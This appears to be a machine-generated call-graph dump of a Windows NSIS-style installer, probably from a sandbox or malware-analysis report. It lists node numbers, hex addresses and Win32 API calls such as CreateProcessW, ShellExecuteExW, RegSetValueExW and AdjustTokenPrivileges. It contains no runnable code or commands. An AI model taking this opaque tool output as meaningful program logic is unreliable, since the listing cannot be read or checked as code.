405940 RemoveDirectoryW 4134 40594e 4131->4134 4132 405948 DeleteFileW 4132->4134 4133 405952 4133->4089 4134->4133 4135 40595e SetFileAttributesW 4134->4135 4135->4133 4137 406046 4136->4137 4138 406039 4136->4138 4137->4089 4150 405eab 4138->4150 4141 405af1 4140->4141 4142 4065b8 FindClose 4140->4142 4141->4074 4141->4086 4142->4141 4144 405afb 4143->4144 4145 405b4c lstrcatW 4143->4145 4144->4092 4145->4144 4146->4110 4148 405931 4147->4148 4149 405d3e SetFileAttributesW 4147->4149 4148->4131 4148->4132 4148->4133 4149->4148 4151 405f01 GetShortPathNameW 4150->4151 4152 405edb 4150->4152 4154 406020 4151->4154 4155 405f16 4151->4155 4177 405d51 GetFileAttributesW CreateFileW 4152->4177 4154->4137 4155->4154 4156 405f1e wsprintfA 4155->4156 4158 406281 17 API calls 4156->4158 4157 405ee5 CloseHandle GetShortPathNameW 4157->4154 4159 405ef9 4157->4159 4160 405f46 4158->4160 4159->4151 4159->4154 4178 405d51 GetFileAttributesW CreateFileW 4160->4178 4162 405f53 4162->4154 4163 405f62 GetFileSize GlobalAlloc 4162->4163 4164 405f84 4163->4164 4165 406019 CloseHandle 4163->4165 4179 405dd4 ReadFile 4164->4179 4165->4154 4170 405fa3 lstrcpyA 4173 405fc5 4170->4173 4171 405fb7 4172 405cb6 4 API calls 4171->4172 4172->4173 4174 405ffc SetFilePointer 4173->4174 4186 405e03 WriteFile 4174->4186 4177->4157 4178->4162 4180 405df2 4179->4180 4180->4165 4181 405cb6 lstrlenA 4180->4181 4182 405cf7 lstrlenA 4181->4182 4183 405cd0 lstrcmpiA 4182->4183 4184 405cff 4182->4184 4183->4184 4185 405cee CharNextA 4183->4185 4184->4170 4184->4171 4185->4182 4187 405e21 GlobalFree 4186->4187 4187->4165 5025 404342 lstrlenW 5026 404361 5025->5026 5027 404363 WideCharToMultiByte 5025->5027 5026->5027 4274 401e43 4282 402c15 4274->4282 4276 401e49 4277 402c15 17 API calls 4276->4277 4278 401e55 4277->4278 4279 401e61 ShowWindow 4278->4279 4280 401e6c EnableWindow 4278->4280 4281 402abf 4279->4281 4280->4281 4283 406281 17 API calls 4282->4283 4284 402c2a 4283->4284 4284->4276 5028 4046c3 5029 404700 5028->5029 5030 4046ef 5028->5030 5031 40470c GetDlgItem 5029->5031 5038 40476b 5029->5038 5089 4058a5 GetDlgItemTextW 5030->5089 5033 404720 5031->5033 5037 404734 SetWindowTextW 5033->5037 5041 405bdb 4 API calls 5033->5041 5034 40484f 5087 4049fe 5034->5087 5091 4058a5 GetDlgItemTextW 5034->5091 5035 4046fa 5036 4064f3 5 API calls 5035->5036 5036->5029 5042 4041f4 18 API calls 5037->5042 5038->5034 5043 406281 17 API calls 5038->5043 5038->5087 5040 40425b 8 API calls 5045 404a12 5040->5045 5046 40472a 5041->5046 5047 404750 5042->5047 5048 4047df SHBrowseForFolderW 5043->5048 5044 40487f 5049 405c38 18 API calls 5044->5049 5046->5037 5053 405b30 3 API calls 5046->5053 5050 4041f4 18 API calls 5047->5050 5048->5034 5051 4047f7 CoTaskMemFree 5048->5051 5052 404885 5049->5052 5054 40475e 5050->5054 5055 405b30 3 API calls 5051->5055 5092 40625f lstrcpynW 5052->5092 5053->5037 5090 404229 SendMessageW 5054->5090 5057 404804 5055->5057 5060 40483b SetDlgItemTextW 5057->5060 5064 406281 17 API calls 5057->5064 5059 404764 5063 406639 5 API calls 5059->5063 5060->5034 5061 40489c 5062 406639 5 API calls 5061->5062 5070 4048a3 5062->5070 5063->5038 5065 404823 lstrcmpiW 5064->5065 5065->5060 5067 404834 lstrcatW 5065->5067 5066 4048e4 5093 40625f lstrcpynW 5066->5093 5067->5060 5069 4048eb 5071 405bdb 4 API calls 5069->5071 5070->5066 5075 405b7c 2 API calls 5070->5075 5076 40493c 5070->5076 5072 4048f1 GetDiskFreeSpaceW 5071->5072 5074 404915 MulDiv 5072->5074 5072->5076 5074->5076 5075->5070 5077 4049ad 5076->5077 5094 404b48 5076->5094 5078 4049d0 5077->5078 5080 40140b 2 API calls 5077->5080 5105 404216 KiUserCallbackDispatcher 5078->5105 5080->5078 5082 4049af SetDlgItemTextW 5082->5077 5083 40499f 5097 404a7f 5083->5097 5086 4049ec 5086->5087 5106 40461c 5086->5106 5087->5040 5089->5035 5090->5059 5091->5044 5092->5061 5093->5069 5095 404a7f 20 API calls 5094->5095 5096 40499a 5095->5096 5096->5082 5096->5083 5098 404a98 5097->5098 5099 406281 17 API calls 5098->5099 5100 404afc 5099->5100 5101 406281 17 API calls 5100->5101 5102 404b07 5101->5102 5103 406281 17 API calls 5102->5103 5104 404b1d lstrlenW wsprintfW SetDlgItemTextW 5103->5104 5104->5077 5105->5086 5107 40462a 5106->5107 5108 40462f SendMessageW 5106->5108 5107->5108 5108->5087 4289 402644 4290 402c15 17 API calls 4289->4290 4291 402653 4290->4291 4292 40269d ReadFile 4291->4292 4293 402736 4291->4293 4294 405dd4 ReadFile 4291->4294 4296 402792 4291->4296 4297 4026dd MultiByteToWideChar 4291->4297 4299 402703 SetFilePointer MultiByteToWideChar 4291->4299 4300 4027a3 4291->4300 4302 402790 4291->4302 4292->4291 4292->4302 4293->4291 4293->4302 4303 405e32 SetFilePointer 4293->4303 4294->4291 4312 4061a6 wsprintfW 4296->4312 4297->4291 4299->4291 4301 4027c4 SetFilePointer 4300->4301 4300->4302 4301->4302 4304 405e6a 4303->4304 4305 405e4e 4303->4305 4304->4293 4306 405dd4 ReadFile 4305->4306 4307 405e5a 4306->4307 4307->4304 4308 405e73 SetFilePointer 4307->4308 4309 405e9b SetFilePointer 4307->4309 4308->4309 4310 405e7e 4308->4310 4309->4304 4311 405e03 WriteFile 4310->4311 4311->4304 4312->4302 5109 402348 5110 402c37 17 API calls 5109->5110 5111 402357 5110->5111 5112 402c37 17 API calls 5111->5112 5113 402360 5112->5113 5114 402c37 17 API calls 5113->5114 5115 40236a GetPrivateProfileStringW 5114->5115 4354 4014cb 4355 4052c3 24 API calls 4354->4355 4356 4014d2 4355->4356 5116 4016cc 5117 402c37 17 API calls 5116->5117 5118 4016d2 GetFullPathNameW 5117->5118 5119 40170e 5118->5119 5120 4016ec 5118->5120 5121 401723 GetShortPathNameW 5119->5121 5122 402abf 5119->5122 5120->5119 5123 4065a2 2 API calls 5120->5123 5121->5122 5124 4016fe 5123->5124 5124->5119 5126 40625f lstrcpynW 5124->5126 5126->5119 5127 401b4d 5128 402c37 17 API calls 5127->5128 5129 401b54 5128->5129 5130 402c15 17 API calls 5129->5130 5131 401b5d wsprintfW 5130->5131 5132 402abf 5131->5132 4608 403350 SetErrorMode GetVersion 4609 403395 4608->4609 4610 40338f 4608->4610 4612 4065c9 3 API calls 4609->4612 4611 406639 5 API calls 4610->4611 4611->4609 4613 4033ab lstrlenA 4612->4613 4613->4609 4614 4033bb 4613->4614 4615 406639 5 API calls 4614->4615 4616 4033c2 4615->4616 4617 406639 5 API calls 4616->4617 4618 4033c9 4617->4618 4619 406639 5 API calls 4618->4619 4624 4033d5 #17 OleInitialize SHGetFileInfoW 4619->4624 4622 403421 GetCommandLineW 4700 40625f lstrcpynW 4622->4700 4699 40625f lstrcpynW 4624->4699 4625 403433 GetModuleHandleW 4626 40344b 4625->4626 4627 405b5d CharNextW 4626->4627 4628 40345a CharNextW 4627->4628 4629 403584 GetTempPathW 4628->4629 4637 403473 4628->4637 4701 40331f 4629->4701 4631 40359c 4632 4035a0 GetWindowsDirectoryW lstrcatW 4631->4632 4633 4035f6 DeleteFileW 4631->4633 4634 40331f 12 API calls 4632->4634 4711 402ec1 GetTickCount GetModuleFileNameW 4633->4711 4638 4035bc 4634->4638 4635 405b5d CharNextW 4635->4637 4637->4635 4643 40356f 4637->4643 4645 40356d 4637->4645 4638->4633 4640 4035c0 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4638->4640 4639 40360a 4641 4036bd 4639->4641 4646 4036ad 4639->4646 4651 405b5d CharNextW 4639->4651 4644 40331f 12 API calls 4640->4644 4798 403893 4641->4798 4795 40625f lstrcpynW 4643->4795 4649 4035ee 4644->4649 4645->4629 4739 40396d 4646->4739 4649->4633 4649->4641 4663 403629 4651->4663 4652 4037f7 4655 40387b ExitProcess 4652->4655 4656 4037ff GetCurrentProcess OpenProcessToken 4652->4656 4653 4036d7 4654 4058c1 MessageBoxIndirectW 4653->4654 4660 4036e5 ExitProcess 4654->4660 4661 403817 LookupPrivilegeValueW AdjustTokenPrivileges 4656->4661 4662 40384b 4656->4662 4658 403687 4664 405c38 18 API calls 4658->4664 4659 4036ed 4665 40582c 5 API calls 4659->4665 4661->4662 4666 406639 5 API calls 4662->4666 4663->4658 4663->4659 4667 403693 4664->4667 4668 4036f2 lstrcatW 4665->4668 4669 403852 4666->4669 4667->4641 4796 40625f lstrcpynW 4667->4796 4670 403703 lstrcatW 4668->4670 4671 40370e lstrcatW lstrcmpiW 4668->4671 4672 403867 ExitWindowsEx 4669->4672 4673 403874 4669->4673 4670->4671 4671->4641 4675 40372a 4671->4675 4672->4655 4672->4673 4807 40140b 4673->4807 4678 403736 4675->4678 4679 40372f 4675->4679 4677 4036a2 4797 40625f lstrcpynW 4677->4797 4680 40580f 2 API calls 4678->4680 4682 405792 4 API calls 4679->4682 4684 40373b SetCurrentDirectoryW 4680->4684 4683 403734 4682->4683 4683->4684 4685 403756 4684->4685 4686 40374b 4684->4686 4806 40625f lstrcpynW 4685->4806 4805 40625f lstrcpynW 4686->4805 4689 406281 17 API calls 4690 403795 DeleteFileW 4689->4690 4691 4037a2 CopyFileW 4690->4691 4696 403764 4690->4696 4691->4696 4692 4037eb 4693 406025 36 API calls 4692->4693 4693->4641 4694 406025 36 API calls 4694->4696 4695 406281 17 API calls 4695->4696 4696->4689 4696->4692 4696->4694 4696->4695 4697 405844 2 API calls 4696->4697 4698 4037d6 CloseHandle 4696->4698 4697->4696 4698->4696 4699->4622 4700->4625 4702 4064f3 5 API calls 4701->4702 4704 40332b 4702->4704 4703 403335 4703->4631 4704->4703 4705 405b30 3 API calls 4704->4705 4706 40333d 4705->4706 4707 40580f 2 API calls 4706->4707 4708 403343 4707->4708 4810 405d80 4708->4810 4814 405d51 GetFileAttributesW CreateFileW 4711->4814 4713 402f01 4737 402f11 4713->4737 4815 40625f lstrcpynW 4713->4815 4715 402f27 4716 405b7c 2 API calls 4715->4716 4717 402f2d 4716->4717 4816 40625f lstrcpynW 4717->4816 4719 402f38 GetFileSize 4720 403034 4719->4720 4738 402f4f 4719->4738 4817 402e5d 4720->4817 4722 40303d 4724 40306d GlobalAlloc 4722->4724 4722->4737 4829 403308 SetFilePointer 4722->4829 4723 4032f2 ReadFile 4723->4738 4828 403308 SetFilePointer 4724->4828 4726 4030a0 4730 402e5d 6 API calls 4726->4730 4728 403056 4731 4032f2 ReadFile 4728->4731 4729 403088 4732 4030fa 31 API calls 4729->4732 4730->4737 4733 403061 4731->4733 4735 403094 4732->4735 4733->4724 4733->4737 4734 402e5d 6 API calls 4734->4738 4735->4735 4736 4030d1 SetFilePointer 4735->4736 4735->4737 4736->4737 4737->4639 4738->4720 4738->4723 4738->4726 4738->4734 4738->4737 4740 406639 5 API calls 4739->4740 4741 403981 4740->4741 4742 403987 4741->4742 4743 403999 4741->4743 4838 4061a6 wsprintfW 4742->4838 4744 40612d 3 API calls 4743->4744 4745 4039c9 4744->4745 4746 4039e8 lstrcatW 4745->4746 4748 40612d 3 API calls 4745->4748 4749 403997 4746->4749 4748->4746 4830 403c43 4749->4830 4752 405c38 18 API calls 4753 403a1a 4752->4753 4754 403aae 4753->4754 4756 40612d 3 API calls 4753->4756 4755 405c38 18 API calls 4754->4755 4757 403ab4 4755->4757 4758 403a4c 4756->4758 4759 403ac4 LoadImageW 4757->4759 4760 406281 17 API calls 4757->4760 4758->4754 4766 403a6d lstrlenW 4758->4766 4767 405b5d CharNextW 4758->4767 4761 403b6a 4759->4761 4762 403aeb RegisterClassW 4759->4762 4760->4759 4765 40140b 2 API calls 4761->4765 4763 403b21 SystemParametersInfoW CreateWindowExW 4762->4763 4764 403b74 4762->4764 4763->4761 4764->4641 4770 403b70 4765->4770 4768 403aa1 4766->4768 4769 403a7b lstrcmpiW 4766->4769 4771 403a6a 4767->4771 4773 405b30 3 API calls 4768->4773 4769->4768 4772 403a8b GetFileAttributesW 4769->4772 4770->4764 4775 403c43 18 API calls 4770->4775 4771->4766 4774 403a97 4772->4774 4776 403aa7 4773->4776 4774->4768 4777 405b7c 2 API calls 4774->4777 4778 403b81 4775->4778 4839 40625f lstrcpynW 4776->4839 4777->4768 4780 403c10 4778->4780 4781 403b8d ShowWindow 4778->4781 4782 405396 5 API calls 4780->4782 4783 4065c9 3 API calls 4781->4783 4784 403c16 4782->4784 4785 403ba5 4783->4785 4786 403c32 4784->4786 4787 403c1a 4784->4787 4788 403bb3 GetClassInfoW 4785->4788 4792 4065c9 3 API calls 4785->4792 4791 40140b 2 API calls 4786->4791 4787->4764 4794 40140b 2 API calls 4787->4794 4789 403bc7 GetClassInfoW RegisterClassW 4788->4789 4790 403bdd DialogBoxParamW 4788->4790 4789->4790 4793 40140b 2 API calls 4790->4793 4791->4764 4792->4788 4793->4764 4794->4764 4795->4645 4796->4677 4797->4646 4799 4038ab 4798->4799 4800 40389d CloseHandle 4798->4800 4844 4038d8 4799->4844 4800->4799 4803 40596d 67 API calls 4804 4036c6 OleUninitialize 4803->4804 4804->4652 4804->4653 4805->4685 4806->4696 4808 401389 2 API calls 4807->4808 4809 401420 4808->4809 4809->4655 4811 405d8d GetTickCount GetTempFileNameW 4810->4811 4812 40334e 4811->4812 4813 405dc3 4811->4813 4812->4631 4813->4811 4813->4812 4814->4713 4815->4715 4816->4719 4818 402e66 4817->4818 4819 402e7e 4817->4819 4822 402e76 4818->4822 4823 402e6f DestroyWindow 4818->4823 4820 402e86 4819->4820 4821 402e8e GetTickCount 4819->4821 4824 406675 2 API calls 4820->4824 4825 402e9c CreateDialogParamW ShowWindow 4821->4825 4826 402ebf 4821->4826 4822->4722 4823->4822 4827 402e8c 4824->4827 4825->4826 4826->4722 4827->4722 4828->4729 4829->4728 4831 403c57 4830->4831 4840 4061a6 wsprintfW 4831->4840 4833 403cc8 4841 403cfc 4833->4841 4835 4039f8 4835->4752 4836 403ccd 4836->4835 4837 406281 17 API calls 4836->4837 4837->4836 4838->4749 4839->4754 4840->4833 4842 406281 17 API calls 4841->4842 4843 403d0a SetWindowTextW 4842->4843 4843->4836 4845 4038e6 4844->4845 4846 4038b0 4845->4846 4847 4038eb FreeLibrary GlobalFree 4845->4847 4846->4803 4847->4846 4847->4847 5133 401f52 5134 402c37 17 API calls 5133->5134 5135 401f59 5134->5135 5136 4065a2 2 API calls 5135->5136 5137 401f5f 5136->5137 5139 401f70 5137->5139 5140 4061a6 wsprintfW 5137->5140 5140->5139 5141 402253 5142 402c37 17 API calls 5141->5142 5143 402259 5142->5143 5144 402c37 17 API calls 5143->5144 5145 402262 5144->5145 5146 402c37 17 API calls 5145->5146 5147 40226b 5146->5147 5148 4065a2 2 API calls 5147->5148 5149 402274 5148->5149 5150 402285 lstrlenW lstrlenW 5149->5150 5154 402278 5149->5154 5152 4052c3 24 API calls 5150->5152 5151 4052c3 24 API calls 5155 402280 5151->5155 5153 4022c3 SHFileOperationW 5152->5153 5153->5154 5153->5155 5154->5151 5156 401956 5157 402c37 17 API calls 5156->5157 5158 40195d lstrlenW 5157->5158 5159 40258c 5158->5159 5160 4014d7 5161 402c15 17 API calls 5160->5161 5162 4014dd Sleep 5161->5162 5164 402abf 5162->5164 5165 4022d7 5166 4022f1 5165->5166 5167 4022de 5165->5167 5168 406281 17 API calls 5167->5168 5169 4022eb 5168->5169 5170 4058c1 MessageBoxIndirectW 5169->5170 5170->5166 5171 401d57 GetDlgItem GetClientRect 5172 402c37 17 API calls 5171->5172 5173 401d89 LoadImageW SendMessageW 5172->5173 5174 401da7 DeleteObject 5173->5174 5175 402abf 5173->5175 5174->5175 5176 402dd7 5177 402e02 5176->5177 5178 402de9 SetTimer 5176->5178 5179 402e57 5177->5179 5180 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5177->5180 5178->5177 5180->5179 4968 40175c 4969 402c37 17 API calls 4968->4969 4970 401763 4969->4970 4971 405d80 2 API calls 4970->4971 4972 40176a 4971->4972 4973 405d80 2 API calls 4972->4973 4973->4972 4974 4023de 4975 402c37 17 API calls 4974->4975 4976 4023f0 4975->4976 4977 402c37 17 API calls 4976->4977 4978 4023fa 4977->4978 4991 402cc7 4978->4991 4980 402885 4982 402432 4983 40243e 4982->4983 4985 402c15 17 API calls 4982->4985 4986 40245d RegSetValueExW 4983->4986 4988 4030fa 31 API calls 4983->4988 4984 402c37 17 API calls 4987 402428 lstrlenW 4984->4987 4985->4983 4989 402473 RegCloseKey 4986->4989 4987->4982 4988->4986 4989->4980 4992 402ce2 4991->4992 4995 4060fa 4992->4995 4996 406109 4995->4996 4997 406114 RegCreateKeyExW 4996->4997 4998 40240a 4996->4998 4997->4998 4998->4980 4998->4982 4998->4984 5181 402862 5182 402c37 17 API calls 5181->5182 5183 402869 FindFirstFileW 5182->5183 5184 402891 5183->5184 5187 40287c 5183->5187 5189 4061a6 wsprintfW 5184->5189 5186 40289a 5190 40625f lstrcpynW 5186->5190 5189->5186 5190->5187 5191 401563 5192 402a65 5191->5192 5195 4061a6 wsprintfW 5192->5195 5194 402a6a 5195->5194 5196 401968 5197 402c15 17 API calls 5196->5197 5198 40196f 5197->5198 5199 402c15 17 API calls 5198->5199 5200 40197c 5199->5200 5201 402c37 17 API calls 5200->5201 5202 401993 lstrlenW 5201->5202 5203 4019a4 5202->5203 5204 4019e5 5203->5204 5208 40625f lstrcpynW 5203->5208 5206 4019d5 5206->5204 5207 4019da lstrlenW 5206->5207 5207->5204 5208->5206 4345 4027e9 4346 4027f0 4345->4346 4347 402a6a 4345->4347 4348 402c15 17 API calls 4346->4348 4349 4027f7 4348->4349 4350 402806 SetFilePointer 4349->4350 4350->4347 4351 402816 4350->4351 4353 4061a6 wsprintfW 4351->4353 4353->4347 5209 100018a9 5210 100018cc 5209->5210 5211 100018ff GlobalFree 5210->5211 5212 10001911 5210->5212 5211->5212 5213 10001272 2 API calls 5212->5213 5214 10001a87 GlobalFree GlobalFree 5213->5214 5215 40166a 5216 402c37 17 API calls 5215->5216 5217 401670 5216->5217 5218 4065a2 2 API calls 5217->5218 5219 401676 5218->5219 5220 401ced 5221 402c15 17 API calls 5220->5221 5222 401cf3 IsWindow 5221->5222 5223 401a20 5222->5223 4539 40176f 4540 402c37 17 API calls 4539->4540 4541 401776 4540->4541 4542 401796 4541->4542 4543 40179e 4541->4543 4598 40625f lstrcpynW 4542->4598 4599 40625f lstrcpynW 4543->4599 4546 4017a9 4548 405b30 3 API calls 4546->4548 4547 40179c 4550 4064f3 5 API calls 4547->4550 4549 4017af lstrcatW 4548->4549 4549->4547 4560 4017bb 4550->4560 4551 4065a2 2 API calls 4551->4560 4552 405d2c 2 API calls 4552->4560 4554 4017cd CompareFileTime 4554->4560 4555 40188d 4556 4052c3 24 API calls 4555->4556 4559 401897 4556->4559 4557 4052c3 24 API calls 4564 401879 4557->4564 4558 40625f lstrcpynW 4558->4560 4578 4030fa 4559->4578 4560->4551 4560->4552 4560->4554 4560->4555 4560->4558 4565 406281 17 API calls 4560->4565 4576 401864 4560->4576 4577 405d51 GetFileAttributesW CreateFileW 4560->4577 4600 4058c1 4560->4600 4563 4018be SetFileTime 4566 4018d0 CloseHandle 4563->4566 4565->4560 4566->4564 4567 4018e1 4566->4567 4568 4018e6 4567->4568 4569 4018f9 4567->4569 4571 406281 17 API calls 4568->4571 4570 406281 17 API calls 4569->4570 4573 401901 4570->4573 4572 4018ee lstrcatW 4571->4572 4572->4573 4575 4058c1 MessageBoxIndirectW 4573->4575 4575->4564 4576->4557 4576->4564 4577->4560 4580 403113 4578->4580 4579 403141 4604 4032f2 4579->4604 4580->4579 4607 403308 SetFilePointer 4580->4607 4584 4018aa 4584->4563 4584->4566 4585 40328b 4587 4032cd 4585->4587 4590 40328f 4585->4590 4586 40315e GetTickCount 4586->4584 4591 40318a 4586->4591 4588 4032f2 ReadFile 4587->4588 4588->4584 4589 4032f2 ReadFile 4589->4591 4590->4584 4592 4032f2 ReadFile 4590->4592 4593 405e03 WriteFile 4590->4593 4591->4584 4591->4589 4594 4031e0 GetTickCount 4591->4594 4595 403205 MulDiv wsprintfW 4591->4595 4597 405e03 WriteFile 4591->4597 4592->4590 4593->4590 4594->4591 4596 4052c3 24 API calls 4595->4596 4596->4591 4597->4591 4598->4547 4599->4546 4601 4058d6 4600->4601 4602 405922 4601->4602 4603 4058ea MessageBoxIndirectW 4601->4603 4602->4560 4603->4602 4605 405dd4 ReadFile 4604->4605 4606 40314c 4605->4606 4606->4584 4606->4585 4606->4586 4607->4579 5224 402570 5225 402c37 17 API calls 5224->5225 5226 402577 5225->5226 5229 405d51 GetFileAttributesW CreateFileW 5226->5229 5228 402583 5229->5228 4848 401b71 4849 401bc2 4848->4849 4850 401b7e 4848->4850 4851 401bc7 4849->4851 4852 401bec GlobalAlloc 4849->4852 4853 401c07 4850->4853 4858 401b95 4850->4858 4861 4022f1 4851->4861 4869 40625f lstrcpynW 4851->4869 4855 406281 17 API calls 4852->4855 4854 406281 17 API calls 4853->4854 4853->4861 4856 4022eb 4854->4856 4855->4853 4863 4058c1 MessageBoxIndirectW 4856->4863 4867 40625f lstrcpynW 4858->4867 4860 401bd9 GlobalFree 4860->4861 4862 401ba4 4868 40625f lstrcpynW 4862->4868 4863->4861 4865 401bb3 4870 40625f lstrcpynW 4865->4870 4867->4862 4868->4865 4869->4860 4870->4861 4871 4024f2 4872 402c77 17 API calls 4871->4872 4873 4024fc 4872->4873 4874 402c15 17 API calls 4873->4874 4875 402505 4874->4875 4876 402885 4875->4876 4877 402521 RegEnumKeyW 4875->4877 4878 40252d RegEnumValueW 4875->4878 4879 402549 RegCloseKey 4877->4879 4878->4879 4880 402542 4878->4880 4879->4876 4880->4879 5230 401a72 5231 402c15 17 API calls 5230->5231 5232 401a78 5231->5232 5233 402c15 17 API calls 5232->5233 5234 401a20 5233->5234 4882 401573 4883 401583 ShowWindow 4882->4883 4884 40158c 4882->4884 4883->4884 4885 40159a ShowWindow 4884->4885 4886 402abf 4884->4886 4885->4886 5235 4014f5 SetForegroundWindow 5236 402abf 5235->5236 5237 100016b6 5238 100016e5 5237->5238 5239 10001b18 22 API calls 5238->5239 5240 100016ec 5239->5240 5241 100016f3 5240->5241 5242 100016ff 5240->5242 5245 10001272 2 API calls 5241->5245 5243 10001726 5242->5243 5244 10001709 5242->5244 5247 10001750 5243->5247 5248 1000172c 5243->5248 5246 1000153d 3 API calls 5244->5246 5252 100016fd 5245->5252 5250 1000170e 5246->5250 5249 1000153d 3 API calls 5247->5249 5251 100015b4 3 API calls 5248->5251 5249->5252 5253 100015b4 3 API calls 5250->5253 5254 10001731 5251->5254 5255 10001714 5253->5255 5256 10001272 2 API calls 5254->5256 5257 10001272 2 API calls 5255->5257 5258 10001737 GlobalFree 5256->5258 5259 1000171a GlobalFree 5257->5259 5258->5252 5260 1000174b GlobalFree 5258->5260 5259->5252 5260->5252 5261 401e77 5262 402c37 17 API calls 5261->5262 5263 401e7d 5262->5263 5264 402c37 17 API calls 5263->5264 5265 401e86 5264->5265 5266 402c37 17 API calls 5265->5266 5267 401e8f 5266->5267 5268 402c37 17 API calls 5267->5268 5269 401e98 5268->5269 5270 401423 24 API calls 5269->5270 5271 401e9f 5270->5271 5278 405887 ShellExecuteExW 5271->5278 5273 401ee1 5274 4066ea 5 API calls 5273->5274 5275 402885 5273->5275 5276 401efb CloseHandle 5274->5276 5276->5275 5278->5273 5279 10002238 5280 10002296 5279->5280 5281 100022cc 5279->5281 5280->5281 5282 100022a8 GlobalAlloc 5280->5282 5282->5280 5283 40167b 5284 402c37 17 API calls 5283->5284 5285 401682 5284->5285 5286 402c37 17 API calls 5285->5286 5287 40168b 5286->5287 5288 402c37 17 API calls 5287->5288 5289 401694 MoveFileW 5288->5289 5290 4016a0 5289->5290 5291 4016a7 5289->5291 5293 401423 24 API calls 5290->5293 5292 4065a2 2 API calls 5291->5292 5295 40224a 5291->5295 5294 4016b6 5292->5294 5293->5295 5294->5295 5296 406025 36 API calls 5294->5296 5296->5290 5297 40467c 5298 4046b2 5297->5298 5299 40468c 5297->5299 5301 40425b 8 API calls 5298->5301 5300 4041f4 18 API calls 5299->5300 5302 404699 SetDlgItemTextW 5300->5302 5303 4046be 5301->5303 5302->5298 5304 1000103d 5305 1000101b 5 API calls 5304->5305 5306 10001056 5305->5306 4999 40247e 5000 402c77 17 API calls 4999->5000 5001 402488 5000->5001 5002 402c37 17 API calls 5001->5002 5003 402491 5002->5003 5004 40249c RegQueryValueExW 5003->5004 5007 402885 5003->5007 5005 4024c2 RegCloseKey 5004->5005 5006 4024bc 5004->5006 5005->5007 5006->5005 5010 4061a6 wsprintfW 5006->5010 5010->5005 5307 4020fe 5308 402c37 17 API calls 5307->5308 5309 402105 5308->5309 5310 402c37 17 API calls 5309->5310 5311 40210f 5310->5311 5312 402c37 17 API calls 5311->5312 5313 402119 5312->5313 5314 402c37 17 API calls 5313->5314 5315 402123 5314->5315 5316 402c37 17 API calls 5315->5316 5317 40212d 5316->5317 5318 40216c CoCreateInstance 5317->5318 5319 402c37 17 API calls 5317->5319 5322 40218b 5318->5322 5319->5318 5320 401423 24 API calls 5321 40224a 5320->5321 5322->5320 5322->5321 5323 4019ff 5324 402c37 17 API calls 5323->5324 5325 401a06 5324->5325 5326 402c37 17 API calls 5325->5326 5327 401a0f 5326->5327 5328 401a16 lstrcmpiW 5327->5328 5329 401a28 lstrcmpW 5327->5329 5330 401a1c 5328->5330 5329->5330 3927 401f00 3942 402c37 3927->3942 3934 401f39 CloseHandle 3937 402885 3934->3937 3938 401f2b 3939 401f30 3938->3939 3940 401f3b 3938->3940 3967 4061a6 wsprintfW 3939->3967 3940->3934 3943 402c43 3942->3943 3968 406281 3943->3968 3946 401f06 3948 4052c3 3946->3948 3949 4052de 3948->3949 3957 401f10 3948->3957 3950 4052fa lstrlenW 3949->3950 3953 406281 17 API calls 3949->3953 3951 405323 3950->3951 3952 405308 lstrlenW 3950->3952 3955 405336 3951->3955 3956 405329 SetWindowTextW 3951->3956 3954 40531a lstrcatW 3952->3954 3952->3957 3953->3950 3954->3951 3955->3957 3958 40533c SendMessageW SendMessageW SendMessageW 3955->3958 3956->3955 3959 405844 CreateProcessW 3957->3959 3958->3957 3960 401f16 3959->3960 3961 405877 CloseHandle 3959->3961 3960->3934 3960->3937 3962 4066ea WaitForSingleObject 3960->3962 3961->3960 3963 406704 3962->3963 3964 406716 GetExitCodeProcess 3963->3964 4010 406675 3963->4010 3964->3938 3967->3934 3982 40628e 3968->3982 3969 4064d9 3970 402c64 3969->3970 4001 40625f lstrcpynW 3969->4001 3970->3946 3985 4064f3 3970->3985 3972 4064a7 lstrlenW 3972->3982 3974 406281 10 API calls 3974->3972 3977 4063bc GetSystemDirectoryW 3977->3982 3978 4063cf GetWindowsDirectoryW 3978->3982 3979 4064f3 5 API calls 3979->3982 3980 406281 10 API calls 3980->3982 3981 40644a lstrcatW 3981->3982 3982->3969 3982->3972 3982->3974 3982->3977 3982->3978 3982->3979 3982->3980 3982->3981 3983 406403 SHGetSpecialFolderLocation 3982->3983 3994 40612d 3982->3994 3999 4061a6 wsprintfW 3982->3999 4000 40625f lstrcpynW 3982->4000 3983->3982 3984 40641b SHGetPathFromIDListW CoTaskMemFree 3983->3984 3984->3982 3987 406500 3985->3987 3986 406576 3988 40657b CharPrevW 3986->3988 3991 40659c 3986->3991 3987->3986 3989 406569 CharNextW 3987->3989 3992 406555 CharNextW 3987->3992 3993 406564 CharNextW 3987->3993 4006 405b5d 3987->4006 3988->3986 3989->3986 3989->3987 3991->3946 3992->3987 3993->3989 4002 4060cc 3994->4002 3997 406161 RegQueryValueExW RegCloseKey 3998 406191 3997->3998 3998->3982 3999->3982 4000->3982 4001->3970 4003 4060db 4002->4003 4004 4060e4 RegOpenKeyExW 4003->4004 4005 4060df 4003->4005 4004->4005 4005->3997 4005->3998 4007 405b63 4006->4007 4008 405b79 4007->4008 4009 405b6a CharNextW 4007->4009 4008->3987 4009->4007 4011 406692 PeekMessageW 4010->4011 4012 4066a2 WaitForSingleObject 4011->4012 4013 406688 DispatchMessageW 4011->4013 4012->3963 4013->4011 5331 401000 5332 401037 BeginPaint GetClientRect 5331->5332 5333 40100c DefWindowProcW 5331->5333 5335 4010f3 5332->5335 5336 401179 5333->5336 5337 401073 CreateBrushIndirect FillRect DeleteObject 5335->5337 5338 4010fc 5335->5338 5337->5335 5339 401102 CreateFontIndirectW 5338->5339 5340 401167 EndPaint 5338->5340 5339->5340 5341 401112 6 API calls 5339->5341 5340->5336 5341->5340 4188 405402 4189 405423 GetDlgItem GetDlgItem GetDlgItem 4188->4189 4190 4055ac 4188->4190 4234 404229 SendMessageW 4189->4234 4192 4055b5 GetDlgItem CreateThread CloseHandle 4190->4192 4193 4055dd 4190->4193 4192->4193 4257 405396 OleInitialize 4192->4257 4195 405608 4193->4195 4196 4055f4 ShowWindow ShowWindow 4193->4196 4197 40562d 4193->4197 4194 405493 4200 40549a GetClientRect GetSystemMetrics SendMessageW SendMessageW 4194->4200 4198 405614 4195->4198 4199 405668 4195->4199 4239 404229 SendMessageW 4196->4239 4243 40425b 4197->4243 4202 405642 ShowWindow 4198->4202 4203 40561c 4198->4203 4199->4197 4207 405676 SendMessageW 4199->4207 4205 405508 4200->4205 4206 4054ec SendMessageW SendMessageW 